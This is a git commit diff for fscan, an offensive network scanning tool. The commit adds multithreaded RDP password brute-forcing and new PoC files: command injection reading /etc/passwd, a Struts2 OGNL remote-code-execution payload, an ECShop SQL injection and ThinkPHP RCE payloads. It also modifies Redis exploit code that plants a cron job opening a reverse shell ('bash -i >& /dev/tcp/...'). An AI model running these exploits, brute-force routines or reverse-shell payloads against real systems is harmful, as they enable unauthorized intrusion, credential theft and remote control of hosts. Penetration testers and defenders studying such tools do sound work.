mirror of https://github.com/qwqdanchun/fscan.git
poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程
This commit is contained in:
parent
d1ff89676d
commit
4c51ae1f2a
|
@ -13,6 +13,7 @@ func MongodbScan(info *common.HostInfo) error {
|
|||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
|
||||
_, err := MongodbUnauth(info)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
|
||||
|
@ -23,8 +24,7 @@ func MongodbScan(info *common.HostInfo) error {
|
|||
|
||||
func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
|
||||
getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
|
||||
senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
defer func() {
|
||||
|
@ -49,21 +49,10 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
return flag, err
|
||||
}
|
||||
text := string(buf[0:count])
|
||||
if strings.Contains(text, "ismaster") {
|
||||
_, err = conn.Write(getlogdata)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
count, err := conn.Read(buf)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
text := string(buf[0:count])
|
||||
if strings.Contains(text, "totalLinesWritten") {
|
||||
flag = true
|
||||
result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
}
|
||||
return flag, err
|
||||
}
|
||||
|
|
|
@ -46,7 +46,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
|
|||
defer db.Close()
|
||||
err = db.Ping()
|
||||
if err == nil {
|
||||
result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
}
|
||||
|
|
|
@ -22,46 +22,88 @@ import (
|
|||
"time"
|
||||
)
|
||||
|
||||
type Brutelist struct {
|
||||
user string
|
||||
pass string
|
||||
}
|
||||
|
||||
func RdpScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
var signal bool
|
||||
var num = 0
|
||||
var all = len(common.Userdict["rdp"]) * len(common.Passwords)
|
||||
var mutex sync.Mutex
|
||||
brlist := make(chan Brutelist, all)
|
||||
port, _ := strconv.Atoi(info.Ports)
|
||||
|
||||
for _, user := range common.Userdict["rdp"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
port, err := strconv.Atoi(info.Ports)
|
||||
flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
|
||||
if flag == true && err == nil {
|
||||
result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
|
||||
common.LogSuccess(result)
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
|
||||
return err
|
||||
brlist <- Brutelist{user, pass}
|
||||
}
|
||||
}
|
||||
|
||||
for i := 0; i < common.BruteThread; i++ {
|
||||
wg.Add(1)
|
||||
go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
|
||||
}
|
||||
|
||||
close(brlist)
|
||||
go func() {
|
||||
wg.Wait()
|
||||
signal = true
|
||||
}()
|
||||
for !signal {
|
||||
}
|
||||
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func RdpConn(ip, domain, user, password string, port int) (bool, error) {
|
||||
func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brutelist, signal *bool, num *int, all int, mutex *sync.Mutex, timeout int64) {
|
||||
defer wg.Done()
|
||||
for one := range brlist {
|
||||
if *signal == true {
|
||||
return
|
||||
}
|
||||
go incrNum(num, mutex)
|
||||
user, pass := one.user, one.pass
|
||||
flag, err := RdpConn(host, domain, user, pass, port, timeout)
|
||||
if flag == true && err == nil {
|
||||
var result string
|
||||
if domain != "" {
|
||||
result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
*signal = true
|
||||
return
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func incrNum(num *int, mutex *sync.Mutex) {
|
||||
mutex.Lock()
|
||||
*num = *num + 1
|
||||
mutex.Unlock()
|
||||
}
|
||||
|
||||
func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, error) {
|
||||
target := fmt.Sprintf("%s:%d", ip, port)
|
||||
g := NewClient(target, glog.NONE)
|
||||
err := g.Login(domain, user, password)
|
||||
err := g.Login(domain, user, password, timeout)
|
||||
|
||||
//var e
|
||||
if err == nil {
|
||||
return true, nil
|
||||
}
|
||||
//return true, err
|
||||
|
||||
return false, err
|
||||
}
|
||||
|
||||
|
@ -84,12 +126,16 @@ func NewClient(host string, logLevel glog.LEVEL) *Client {
|
|||
}
|
||||
}
|
||||
|
||||
func (g *Client) Login(domain, user, pwd string) error {
|
||||
conn, err := net.DialTimeout("tcp", g.Host, 5*time.Second)
|
||||
func (g *Client) Login(domain, user, pwd string, timeout int64) error {
|
||||
conn, err := net.DialTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return fmt.Errorf("[dial err] %v", err)
|
||||
}
|
||||
defer conn.Close()
|
||||
glog.Info(conn.LocalAddr().String())
|
||||
|
||||
g.tpkt = tpkt.New(core.NewSocketLayer(conn), nla.NewNTLMv2(domain, user, pwd))
|
||||
|
@ -147,7 +193,6 @@ func (g *Client) Login(domain, user, pwd string) error {
|
|||
wg.Done()
|
||||
}
|
||||
})
|
||||
|
||||
wg.Wait()
|
||||
return err
|
||||
}
|
||||
|
|
|
@ -164,6 +164,10 @@ func Expoilt(realhost string, conn net.Conn) error {
|
|||
}
|
||||
}
|
||||
err = recoverdb(dbfilename, dir, conn)
|
||||
//fmt.Println("dbfilename:")
|
||||
//fmt.Println(dbfilename)
|
||||
//fmt.Println("dir:")
|
||||
//fmt.Println(dir)
|
||||
return err
|
||||
}
|
||||
|
||||
|
@ -187,7 +191,11 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
|
|||
return flag, text, err
|
||||
}
|
||||
if strings.Contains(text, "OK") {
|
||||
key, err := Readfile(filename)
|
||||
var key string
|
||||
if filename == "shadow" {
|
||||
key = SshPub
|
||||
} else {
|
||||
key, err = Readfile(filename)
|
||||
if err != nil {
|
||||
text = fmt.Sprintf("Open %s error, %v", filename, err)
|
||||
return flag, text, err
|
||||
|
@ -196,6 +204,7 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
|
|||
text = fmt.Sprintf("the keyfile %s is empty", filename)
|
||||
return flag, text, err
|
||||
}
|
||||
}
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
|
||||
if err != nil {
|
||||
return flag, text, err
|
||||
|
@ -246,7 +255,11 @@ func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
|
|||
return flag, text, err
|
||||
}
|
||||
if strings.Contains(text, "OK") {
|
||||
scanIp, scanPort := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
|
||||
target := strings.Split(host, ":")
|
||||
if len(target) < 2 {
|
||||
return flag, "host error", err
|
||||
}
|
||||
scanIp, scanPort := target[0], target[1]
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scanIp, scanPort)))
|
||||
if err != nil {
|
||||
return flag, text, err
|
||||
|
|
|
@ -56,7 +56,7 @@ func Scan(info common.HostInfo) {
|
|||
case info.Ports == "445":
|
||||
//AddScan(info.Ports, info, ch, &wg) //smb
|
||||
AddScan("1000001", info, ch, &wg) //ms17010
|
||||
AddScan("1000002", info, ch, &wg) //smbghost
|
||||
//AddScan("1000002", info, ch, &wg) //smbghost
|
||||
case info.Ports == "9000":
|
||||
AddScan(info.Ports, info, ch, &wg) //fcgiscan
|
||||
AddScan("1000003", info, ch, &wg) //http
|
||||
|
|
|
@ -22,7 +22,7 @@ import (
|
|||
func WebTitle(info *common.HostInfo) error {
|
||||
err, CheckData := GOWebTitle(info)
|
||||
info.Infostr = WebScan.InfoCheck(info.Url, &CheckData)
|
||||
if common.IsWebCan == false && err == nil {
|
||||
if common.IsWebCan == false && common.IsBrute == false && err == nil {
|
||||
WebScan.WebScan(info)
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
|
||||
|
|
|
@ -188,6 +188,7 @@ fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-G
|
|||
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
|
||||
|
||||
## 最近更新
|
||||
[+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程
|
||||
[+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito
|
||||
[+] 2022/1/11 新增oracle密码爆破
|
||||
[+] 2022/1/7 扫ip/8时,默认会扫每个C段的网关和数个随机IP,推荐参数:-h ip/8 -m icmp.新增LiveTop功能,检测存活时,默认会输出top10的B、C段ip存活数量.
|
||||
|
|
|
@ -6,13 +6,19 @@ import (
|
|||
"github.com/shadow1ng/fscan/WebScan/lib"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
)
|
||||
|
||||
//go:embed pocs
|
||||
var Pocs embed.FS
|
||||
var once sync.Once
|
||||
var AllPocs []*lib.Poc
|
||||
|
||||
func WebScan(info *common.HostInfo) {
|
||||
once.Do(initpoc)
|
||||
var pocinfo = common.Pocinfo
|
||||
buf := strings.Split(info.Url, "/")
|
||||
pocinfo.Target = strings.Join(buf[:3], "/")
|
||||
|
@ -38,5 +44,55 @@ func Execute(PocInfo common.PocInfo) {
|
|||
if PocInfo.Cookie != "" {
|
||||
req.Header.Set("Cookie", PocInfo.Cookie)
|
||||
}
|
||||
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
|
||||
pocs := filterPoc(PocInfo.PocName)
|
||||
lib.CheckMultiPoc(req, pocs, PocInfo.Num)
|
||||
}
|
||||
|
||||
func initpoc() {
|
||||
if common.PocPath == "" {
|
||||
entries, err := Pocs.ReadDir("pocs")
|
||||
if err != nil {
|
||||
fmt.Printf("[-] init poc error: %v", err)
|
||||
return
|
||||
}
|
||||
for _, one := range entries {
|
||||
path := one.Name()
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
if poc, _ := lib.LoadPoc(path, Pocs); poc != nil {
|
||||
AllPocs = append(AllPocs, poc)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
err := filepath.Walk(common.PocPath,
|
||||
func(path string, info os.FileInfo, err error) error {
|
||||
if err != nil || info == nil {
|
||||
return err
|
||||
}
|
||||
if !info.IsDir() {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
poc, _ := lib.LoadPocbyPath(path)
|
||||
if poc != nil {
|
||||
AllPocs = append(AllPocs, poc)
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
})
|
||||
if err != nil {
|
||||
fmt.Printf("[-] init poc error: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func filterPoc(pocname string) (pocs []*lib.Poc) {
|
||||
if pocname == "" {
|
||||
return AllPocs
|
||||
}
|
||||
for _, poc := range AllPocs {
|
||||
if strings.Contains(poc.Name, pocname) {
|
||||
pocs = append(pocs, poc)
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"embed"
|
||||
"fmt"
|
||||
"github.com/google/cel-go/cel"
|
||||
"github.com/shadow1ng/fscan/WebScan/info"
|
||||
|
@ -26,22 +25,22 @@ type Task struct {
|
|||
Poc *Poc
|
||||
}
|
||||
|
||||
func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string) {
|
||||
func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
|
||||
tasks := make(chan Task)
|
||||
var wg sync.WaitGroup
|
||||
for i := 0; i < workers; i++ {
|
||||
go func() {
|
||||
for task := range tasks {
|
||||
isVul, _ ,name:= executePoc(task.Req, task.Poc)
|
||||
isVul, _, name := executePoc(task.Req, task.Poc)
|
||||
if isVul {
|
||||
result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name,name)
|
||||
result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name, name)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
wg.Done()
|
||||
}
|
||||
}()
|
||||
}
|
||||
for _, poc := range LoadMultiPoc(Pocs, pocname) {
|
||||
for _, poc := range pocs {
|
||||
task := Task{
|
||||
Req: req,
|
||||
Poc: poc,
|
||||
|
@ -53,7 +52,7 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
|
|||
close(tasks)
|
||||
}
|
||||
|
||||
func executePoc(oReq *http.Request, p *Poc) (bool, error,string) {
|
||||
func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
||||
c := NewEnvOption()
|
||||
c.UpdateCompileOptions(p.Set)
|
||||
if len(p.Sets) > 0 {
|
||||
|
@ -65,12 +64,12 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error,string) {
|
|||
}
|
||||
env, err := NewEnv(&c)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] %s environment creation error: %s\n",p.Name,err)
|
||||
fmt.Printf("[-] %s environment creation error: %s\n", p.Name, err)
|
||||
return false, err, ""
|
||||
}
|
||||
req, err := ParseRequest(oReq)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] %s ParseRequest error: %s\n",p.Name,err)
|
||||
fmt.Printf("[-] %s ParseRequest error: %s\n", p.Name, err)
|
||||
return false, err, ""
|
||||
}
|
||||
variableMap := make(map[string]interface{})
|
||||
|
@ -163,7 +162,6 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error,string) {
|
|||
return success, nil, ""
|
||||
}
|
||||
|
||||
|
||||
DealWithRule := func(rule Rules) (bool, error) {
|
||||
var (
|
||||
flag, ok bool
|
||||
|
@ -718,7 +716,7 @@ func evalset(env *cel.Env, variableMap map[string]interface{}) {
|
|||
if strings.Contains(k, "payload") {
|
||||
out, err := Evaluate(env, expression, variableMap)
|
||||
if err != nil {
|
||||
//fmt.Println(err)
|
||||
fmt.Println(err)
|
||||
variableMap[k] = expression
|
||||
} else {
|
||||
variableMap[k] = fmt.Sprintf("%v", out)
|
||||
|
@ -729,10 +727,9 @@ func evalset(env *cel.Env, variableMap map[string]interface{}) {
|
|||
|
||||
func CheckInfoPoc(infostr string) string {
|
||||
for _, poc := range info.PocDatas {
|
||||
if strings.Compare(poc.Name,infostr) == 0 {
|
||||
if strings.Compare(poc.Name, infostr) == 0 {
|
||||
return poc.Alias
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
|
|
|
@ -45,6 +45,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
|
|||
if DownProxy != "" {
|
||||
if DownProxy == "1" {
|
||||
DownProxy = "http://127.0.0.1:8080"
|
||||
} else if DownProxy == "2" {
|
||||
DownProxy = "socks5://127.0.0.1:1080"
|
||||
} else if !strings.Contains(DownProxy, "://") {
|
||||
DownProxy = "http://127.0.0.1:" + DownProxy
|
||||
}
|
||||
|
|
|
@ -591,7 +591,7 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
|
|||
body = append(body, buf...)
|
||||
}
|
||||
} else {
|
||||
raw, err := ioutil.ReadAll(oResp.Body)
|
||||
raw, err := ioutil.ReadAll(io.LimitReader(oResp.Body, int64(5<<20)))
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
|
|
@ -8,6 +8,7 @@ import (
|
|||
"fmt"
|
||||
"github.com/golang/protobuf/proto"
|
||||
"gopkg.in/yaml.v3"
|
||||
"io/ioutil"
|
||||
"math"
|
||||
"strings"
|
||||
)
|
||||
|
@ -38,7 +39,6 @@ type Detail struct {
|
|||
Version string `yaml:"version"`
|
||||
}
|
||||
|
||||
|
||||
// Reference imports to suppress errors if they are not otherwise used.
|
||||
var _ = proto.Marshal
|
||||
var _ = fmt.Errorf
|
||||
|
@ -383,29 +383,29 @@ var fileDescriptor_11b04836674e6f94 = []byte{
|
|||
0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
|
||||
}
|
||||
|
||||
|
||||
|
||||
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
|
||||
var pocs []*Poc
|
||||
for _, f := range SelectPoc(Pocs, pocname) {
|
||||
if p, err := loadPoc(f, Pocs); err == nil {
|
||||
if p, err := LoadPoc(f, Pocs); err == nil {
|
||||
pocs = append(pocs, p)
|
||||
}else {
|
||||
fmt.Println("[-] load poc ",f," error:",err)
|
||||
} else {
|
||||
fmt.Println("[-] load poc ", f, " error:", err)
|
||||
}
|
||||
}
|
||||
return pocs
|
||||
}
|
||||
|
||||
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
|
||||
func LoadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
|
||||
p := &Poc{}
|
||||
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error: %v", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
err = yaml.Unmarshal(yamlFile, p)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error: %v", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
return p, err
|
||||
|
@ -424,3 +424,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string {
|
|||
}
|
||||
return foundFiles
|
||||
}
|
||||
|
||||
func LoadPocbyPath(fileName string) (*Poc, error) {
|
||||
p := &Poc{}
|
||||
data, err := ioutil.ReadFile(fileName)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error: %v", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
err = yaml.Unmarshal(data, p)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error: %v", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
return p, err
|
||||
}
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
name: Hotel-Internet-Manage-RCE
|
||||
rules:
|
||||
- method: GET
|
||||
path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
|
||||
Accept-Encoding: "gzip,deflate"
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"parent.doTestResult")
|
||||
detail:
|
||||
author: test
|
||||
Affected Version: "Hotel Internet Billing & Operation Support System"
|
||||
links:
|
||||
- http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
name: poc-yaml-struts2-062-cve-2021-31805-rce
|
||||
rules:
|
||||
- method: POST
|
||||
path: /
|
||||
headers:
|
||||
Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF'
|
||||
Cache-Control: 'max-age=0'
|
||||
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
|
||||
|
||||
body: "\
|
||||
------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n\
|
||||
Content-Disposition: form-data; name=\"id\"\r\n\r\n\
|
||||
%{\r\n\
|
||||
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\r\n
|
||||
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n
|
||||
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\r\n
|
||||
}\r\n\
|
||||
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
|
||||
"
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: Jaky
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg
|
|
@ -0,0 +1,15 @@
|
|||
name: poc-yaml-ecshop-login-sqli
|
||||
set:
|
||||
r1: randomInt(10000, 99999)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /user.php?act=login
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:71:"0,1 procedure analyse(updatexml(1,insert(md5({{r1}}),1,1,0x7e),1),1)-- -";s:2:"id";i:1;}
|
||||
follow_redirects: false
|
||||
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
|
||||
detail:
|
||||
author: chalan630
|
||||
links:
|
||||
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
|
@ -1,5 +1,17 @@
|
|||
name: poc-yaml-thinkphp5023-method-rce
|
||||
rules:
|
||||
set:
|
||||
rand: randomLowercase(10)
|
||||
groups:
|
||||
poc1:
|
||||
- method: POST
|
||||
path: /index.php?s=captcha
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
_method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
|
||||
expression: |
|
||||
response.body.bcontains(bytes(rand))
|
||||
poc2:
|
||||
- method: POST
|
||||
path: /index.php?s=captcha
|
||||
headers:
|
||||
|
@ -8,6 +20,7 @@ rules:
|
|||
_method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1
|
||||
expression: |
|
||||
response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1")
|
||||
|
||||
detail:
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
|
|
@ -79,6 +79,18 @@ func ParsePass(Info *HostInfo) {
|
|||
}
|
||||
}
|
||||
}
|
||||
if PortFile != "" {
|
||||
ports, err := Readfile(PortFile)
|
||||
if err == nil {
|
||||
newport := ""
|
||||
for _, port := range ports {
|
||||
if port != "" {
|
||||
newport += port + ","
|
||||
}
|
||||
}
|
||||
Info.Ports = newport
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func Readfile(filename string) ([]string, error) {
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
package common
|
||||
|
||||
var version = "1.7.0"
|
||||
var version = "1.7.1"
|
||||
var Userdict = map[string][]string{
|
||||
"ftp": {"ftp", "admin", "www", "web", "root", "db", "wwwroot", "data"},
|
||||
"mysql": {"root", "mysql"},
|
||||
|
@ -13,7 +13,7 @@ var Userdict = map[string][]string{
|
|||
"oracle": {"sys", "system", "admin", "test", "web", "orcl"},
|
||||
}
|
||||
|
||||
var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e"}
|
||||
var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789"}
|
||||
var PORTList = map[string]int{
|
||||
"ftp": 21,
|
||||
"ssh": 22,
|
||||
|
@ -37,11 +37,13 @@ var PORTList = map[string]int{
|
|||
"portscan": 0,
|
||||
"icmp": 0,
|
||||
"main": 0,
|
||||
"smb2": 1000004,
|
||||
"wmi": 1000005,
|
||||
}
|
||||
|
||||
var Outputfile = getpath() + "result.txt"
|
||||
var IsSave = true
|
||||
